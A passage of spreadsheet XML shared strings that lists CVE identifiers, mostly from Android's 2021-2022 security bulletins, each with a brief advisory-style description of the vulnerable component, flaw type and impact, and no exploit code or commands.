    <t>In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481</t>
  </si>
  <si>
    <t>CVE-2021-39706</t>
  </si>
  <si>
    <t>In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168</t>
  </si>
  <si>
    <t>CVE-2021-39707</t>
  </si>
  <si>
    <t>In onReceive of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200688991</t>
  </si>
  <si>
    <t>CVE-2021-39708</t>
  </si>
  <si>
    <t>In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206128341</t>
  </si>
  <si>
    <t>CVE-2021-39709</t>
  </si>
  <si>
    <t>In sendSipAccountsRemovedNotification of SipAccountRegistry.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208817618</t>
  </si>
  <si>
    <t>CVE-2021-3971</t>
  </si>
  <si>
    <t>A potential vulnerability by a driver used during older manufacturing processes on some consumer Lenovo Notebook devices that was mistakenly included in the BIOS image could allow an attacker with elevated privileges to modify firmware protection region by modifying an NVRAM variable.</t>
  </si>
  <si>
    <t>CVE-2021-39710</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-202160245References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39711</t>
  </si>
  <si>
    <t>In bpf_prog_test_run_skb of test_run.c, there is a possible out of bounds read due to Incorrect Size Value. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154175781References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39712</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible user after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176918884References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39713</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-173788806References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39714</t>
  </si>
  <si>
    <t>In ion_buffer_kmap_get of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205573273References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39715</t>
  </si>
  <si>
    <t>In __show_regs of process.c, there is a possible leak of kernel memory and addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-178379135References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39716</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-206977562References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39717</t>
  </si>
  <si>
    <t>In iaxxx_btp_write_words of iaxxx-btp.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198653629References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39718</t>
  </si>
  <si>
    <t>In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205035540References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39719</t>
  </si>
  <si>
    <t>In lwis_top_register_io of lwis_device_top.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995178References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-3972</t>
  </si>
  <si>
    <t>A potential vulnerability by a driver used during manufacturing process on some consumer Lenovo Notebook devices' BIOS that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.</t>
  </si>
  <si>
    <t>CVE-2021-39720</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-207433926References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39721</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195726151References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39722</t>
  </si>
  <si>
    <t>In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204585345References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39723</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-209014813References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39724</t>
  </si>
  <si>
    <t>In TuningProviderBase::GetTuningTreeSet of tuning_provider_base.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205753190References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39725</t>
  </si>
  <si>
    <t>In gasket_free_coherent_memory_all of gasket_page_table.c, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151454974References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39726</t>
  </si>
  <si>
    <t>In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-181782896References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39727</t>
  </si>
  <si>
    <t>In eicPresentationRetrieveEntryValue of acropora/app/identity/libeic/EicPresentation.c, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196388042References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39729</t>
  </si>
  <si>
    <t>In the TitanM chip, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202006191References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-3973</t>
  </si>
  <si>
    <t>CVE-2021-39730</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206472503References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39731</t>
  </si>
  <si>
    <t>In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205036834References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39732</t>
  </si>
  <si>
    <t>In copy_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205992503References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39733</t>
  </si>
  <si>
    <t>In amcs_cdev_unlocked_ioctl of audiometrics.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206128522References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39734</t>
  </si>
  <si>
    <t>In sendMessage of OneToOneChatImpl.java (? TBD), there is a possible way to send an RCS message without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-208650395References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39735</t>
  </si>
  <si>
    <t>In gasket_alloc_coherent_memory of gasket_page_table.c, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151455484References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39736</t>
  </si>
  <si>
    <t>In prepare_io_entry and prepare_response of lwis_ioctl.c and lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995773References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39737</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-208229524References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39738</t>
  </si>
  <si>
    <t>In CarSetings, there is a possible to pair BT device bypassing user's consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-216190509</t>
  </si>
  <si>
    <t>CVE-2021-39739</t>
  </si>
  <si>
    <t>In ArrayMap, there is a possible leak of the content of SMS messages due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-184525194</t>
  </si>
  <si>
    <t>CVE-2021-3974</t>
  </si>
  <si>
    <t>CVE-2021-39740</t>
  </si>
  <si>
    <t>In Messaging, there is a possible way to bypass attachment restrictions due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-209965112</t>
  </si>
  <si>
    <t>CVE-2021-39741</t>
  </si>
  <si>
    <t>In Keymaster, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-173567719</t>
  </si>
  <si>
    <t>CVE-2021-39742</t>
  </si>
  <si>
    <t>In Voicemail, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-186405602</t>
  </si>
  <si>
    <t>CVE-2021-39743</t>
  </si>
  <si>
    <t>In PackageManager, there is a possible way to update the last usage time of another package due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201534884</t>
  </si>
  <si>
    <t>CVE-2021-39744</t>
  </si>
  <si>
    <t>In DevicePolicyManag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LAndroid ID: A-192369136</t>
  </si>
  <si>
    <t>CVE-2021-39745</t>
  </si>
  <si>
    <t>In DevicePolicyManager,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LAndroid ID: A-206127671</t>
  </si>
  <si>
    <t>CVE-2021-39746</t>
  </si>
  <si>
    <t>In PermissionController, there is a possible way to delete some local files due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194696395</t>
  </si>
  <si>
    <t>CVE-2021-39747</t>
  </si>
  <si>
    <t>In Settings Provider, there is a possible way to list values of non-readable global settings due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-208268457</t>
  </si>
  <si>
    <t>CVE-2021-39748</t>
  </si>
  <si>
    <t>In InputMethodEditor, there is a possible way to access some files accessible to Settings due to an unsafe PendingIntent. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-203777141</t>
  </si>
  <si>
    <t>CVE-2021-39749</t>
  </si>
  <si>
    <t>In WindowManager, there is a possible way to start non-exported and protected activities due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205996115</t>
  </si>
  <si>
    <t>CVE-2021-3975</t>
  </si>
  <si>
    <t>A use-after-free flaw was found in libvirt. The qemuMonitorUnregister() function in qemuProcessHandleMonitorEOF is called using multiple threads without being adequately protected by a monitor lock. This flaw could be triggered by the virConnectGetAllDomainStats API when the guest is shutting down. An unprivileged client with a read-only connection could use this flaw to perform a denial of service attack by causing the libvirt daemon to crash.</t>
  </si>
  <si>
    <t>CVE-2021-39750</t>
  </si>
  <si>
    <t>In PackageManager, there is a possible way to change the splash screen theme of other apps due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-206474016</t>
  </si>
  <si>
    <t>CVE-2021-39751</t>
  </si>
  <si>
    <t>In Settings, there is a possible way to read Bluetooth device names without proper permissions due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-172838801</t>
  </si>
  <si>
    <t>CVE-2021-39752</t>
  </si>
  <si>
    <t>In Bubbles, there is a possible way to interfere with Bubbles due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202756848</t>
  </si>
  <si>
    <t>CVE-2021-39753</t>
  </si>
  <si>
    <t>In DomainVerificationService, there is a possible way to access app domain verification information due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-200035185</t>
  </si>
  <si>
    <t>CVE-2021-39754</t>
  </si>
  <si>
    <t>In ContextImpl,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Android ID: A-207133709</t>
  </si>
  <si>
    <t>CVE-2021-39755</t>
  </si>
  <si>
    <t>In DevicePolicyManager, there is a possible way to reveal the existence of an installed package without proper query permissions due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-204995407</t>
  </si>
  <si>
    <t>CVE-2021-39756</t>
  </si>
  <si>
    <t>In Framework,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LAndroid ID: A-184354287</t>
  </si>
  <si>
    <t>CVE-2021-39757</t>
  </si>
  <si>
    <t>In PermissionController, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-176094662</t>
  </si>
  <si>
    <t>CVE-2021-39758</t>
  </si>
  <si>
    <t>In WindowManager, there is a possible way to start a foreground activity from the background due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205130886</t>
  </si>
  <si>
    <t>CVE-2021-39759</t>
  </si>
  <si>
    <t>In libstagefright, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-180200830</t>
  </si>
  <si>
    <t>CVE-2021-3976</t>
  </si>
  <si>
    <t>CVE-2021-39760</t>
  </si>
  <si>
    <t>In AudioService,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LAndroid ID: A-194110526</t>
  </si>
  <si>
    <t>CVE-2021-39761</t>
  </si>
  <si>
    <t>In Media,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LAndroid ID: A-179783181</t>
  </si>
  <si>
    <t>CVE-2021-39762</t>
  </si>
  <si>
    <t>In tremolo, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-210625816</t>
  </si>
  <si>
    <t>CVE-2021-39763</t>
  </si>
  <si>
    <t>In Settings, there is a possible way to make the user enable WiFi due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-199176115</t>
  </si>
  <si>
    <t>CVE-2021-39764</t>
  </si>
  <si>
    <t>In Settings, there is a possible way to display an incorrect app name due to improper input validation. This could lead to local escalation of privilege via app spoofing with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-170642995</t>
  </si>
  <si>
    <t>CVE-2021-39765</t>
  </si>
  <si>
    <t>In Gallery, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201535427</t>
  </si>
  <si>
    <t>CVE-2021-39766</t>
  </si>
  <si>
    <t>In Settings,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LAndroid ID: A-198296421</t>
  </si>
  <si>
    <t>CVE-2021-39767</t>
  </si>
  <si>
    <t>In miniadb, there is a possible way to get read/write access to recovery system properties due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201308542</t>
  </si>
  <si>
    <t>CVE-2021-39768</t>
  </si>
  <si>
    <t>In Settings, there is a possible way to add an auto-connect WiFi network without the user's consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202017876</t>
  </si>
  <si>
    <t>CVE-2021-39769</t>
  </si>
  <si>
    <t>In Device Policy, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-193663287</t>
  </si>
  <si>
    <t>CVE-2021-3977</t>
  </si>
  <si>
    <t>invoiceninja is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-39770</t>
  </si>
  <si>
    <t>In Framework, there is a possible disclosure of the device owner package due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-193033501</t>
  </si>
  <si>
    <t>CVE-2021-39771</t>
  </si>
  <si>
    <t>In Settings, there is a possible way to misrepresent which app wants to add a wifi network due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-198661951</t>
  </si>
  <si>
    <t>CVE-2021-39772</t>
  </si>
  <si>
    <t>In Bluetooth, there is a possible way to access the a2dp audio control switch due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-181962322</t>
  </si>
  <si>
    <t>CVE-2021-39773</t>
  </si>
  <si>
    <t>In VpnManagerService, there is a possible disclosure of installed VPN packages due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-191276656</t>
  </si>
  <si>
    <t>CVE-2021-39774</t>
  </si>
  <si>
    <t>In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205989472</t>
  </si>
  <si>
    <t>CVE-2021-39775</t>
  </si>
  <si>
    <t>In People,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LAndroid ID: A-206465854</t>
  </si>
  <si>
    <t>CVE-2021-39776</t>
  </si>
  <si>
    <t>In NFC, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-192614125</t>
  </si>
  <si>
    <t>CVE-2021-39777</t>
  </si>
  <si>
    <t>In Telephony, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194743207</t>
  </si>
  <si>
    <t>CVE-2021-39778</t>
  </si>
  <si>
    <t>In Telecomm, there is a possible way to determine whether an app is installed, without query permissions, due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-196406138</t>
  </si>
  <si>
    <t>CVE-2021-39779</t>
  </si>
  <si>
    <t>In getCallStateUsingPackage of Telecom Service, there is a missing permission check. This could lead to local information disclosure of the call state with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-190400974</t>
  </si>
  <si>
    <t>CVE-2021-39780</t>
  </si>
  <si>
    <t>In Traceur, there is a possible bypass of developer settings requirements for capturing system traces due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-204992293</t>
  </si>
  <si>
    <t>CVE-2021-39781</t>
  </si>
  <si>
    <t>In SmsController, there is a possible information disclosure due to a permissions bypass. This could lead to local escalation of privilege and sending sms with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-195311502</t>
  </si>
  <si>
    <t>CVE-2021-39782</t>
  </si>
  <si>
    <t>In Telephony, there is a possible unauthorized modification of the PLMN SIM file due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202760015</t>
  </si>
  <si>
    <t>CVE-2021-39783</t>
  </si>
  <si>
    <t>In rcsservice, there is a possible way to modify TTY mode due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-197960597</t>
  </si>
  <si>
    <t>CVE-2021-39784</t>
  </si>
  <si>
    <t>In CellBroadcastReceiver, there is a possible path to enable specific cellular features due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-200163477</t>
  </si>
  <si>
    <t>CVE-2021-39786</t>
  </si>
  <si>
    <t>In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-192551247</t>
  </si>
  <si>
    <t>CVE-2021-39787</t>
  </si>
  <si>
    <t>In SystemUI, there is a possible arbitrary Activity launch due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202506934</t>
  </si>
  <si>
    <t>CVE-2021-39788</t>
  </si>
  <si>
    <t>In TelecomManager, there is a possible way to check if a particular self managed phone account was registered on the device due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-191768014</t>
  </si>
  <si>
    <t>CVE-2021-39789</t>
  </si>
  <si>
    <t>In Telecom, there is a possible leak of TTY mode change due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-203880906</t>
  </si>
  <si>
    <t>CVE-2021-3979</t>
  </si>
  <si>
    <t>A key length flaw was found in Red Hat Ceph Storage. An attacker can exploit the fact that the key length is incorrectly passed in an encryption algorithm to create a non random key, which is weaker and can be exploited for loss of confidentiality and integrity on encrypted disks.</t>
  </si>
  <si>
    <t>CVE-2021-39790</t>
  </si>
  <si>
    <t>In Dialer, there is a possible way to manipulate visual voicemail settings due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-186405146</t>
  </si>
  <si>
    <t>CVE-2021-39791</t>
  </si>
  <si>
    <t>In WallpaperManagerService, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194112606</t>
  </si>
  <si>
    <t>CVE-2021-39792</t>
  </si>
  <si>
    <t>In usb_gadget_giveback_request of core.c, there is a possible use after free out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161010552References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39793</t>
  </si>
  <si>
    <t>In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39794</t>
  </si>
  <si>
    <t>In broadcastPortInfo of AdbService.java, there is a possible way for apps to run code as the shell user, if wireless debugging is enabled, due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-205836329</t>
  </si>
  <si>
    <t>CVE-2021-39796</t>
  </si>
  <si>
    <t>In HarmfulAppWarningActivity of HarmfulAppWarningActivity.java, there is a possible way to trick victim to install harmful app due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-205595291</t>
  </si>
  <si>
    <t>CVE-2021-39797</t>
  </si>
  <si>
    <t>In several functions of of LauncherApps.java, there is a possible escalation of privilege due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-209607104</t>
  </si>
  <si>
    <t>CVE-2021-39798</t>
  </si>
  <si>
    <t>In Bitmap_createFromParcel of Bitmap.cpp, there is a possible arbitrary code execution due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-213169612</t>
  </si>
  <si>
    <t>CVE-2021-39799</t>
  </si>
  <si>
    <t>In AttributionSource of AttributionSource.java, there is a possible permission bypass due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-200288596</t>
  </si>
  <si>
    <t>CVE-2021-3980</t>
  </si>
  <si>
    <t>elgg is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor</t>
  </si>
  <si>
    <t>359</t>
  </si>
  <si>
    <t>CVE-2021-39800</t>
  </si>
  <si>
    <t>In ion_ioctl of ion-ioctl.c, there is a possible way to leak kernel head data due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-208277166References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39801</t>
  </si>
  <si>
    <t>In ion_ioctl of ion-ioctl.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-209791720References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39802</t>
  </si>
  <si>
    <t>In change_pte_range of mprotect.c , there is a possible way to make a shared mmap writable due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-213339151References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-39803</t>
  </si>
  <si>
    <t>In ~Impl of C2AllocatorIon.cpp, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-193790350</t>
  </si>
  <si>
    <t>CVE-2021-39804</t>
  </si>
  <si>
    <t>In reinit of HeifDecoderImpl.cpp, there is a possible crash due to a missing null check. This could lead to remote persistent denial of service in the file picker with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-215002587</t>
  </si>
  <si>
    <t>CVE-2021-39805</t>
  </si>
  <si>
    <t>In l2cble_process_sig_cmd of l2c_ble.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure through Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-212694559</t>
  </si>
  <si>
    <t>CVE-2021-39806</t>
  </si>
  <si>
    <t>In closef of label_backends_android.c, there is a possible way to corrupt memory due to a double free. This could lead to local escalation of privilege during startup of servicemanager, if an attacker can trigger an initialization failure, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-215387420</t>
  </si>
  <si>
    <t>CVE-2021-39807</t>
  </si>
  <si>
    <t>In handleNfcStateChanged of SecureNfcEnabler.java, there is a possible way to enable NFC from the Guest account due to a missing permission check. This could lead to local escalation of privilege from the Guest account with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-209446496</t>
  </si>
  <si>
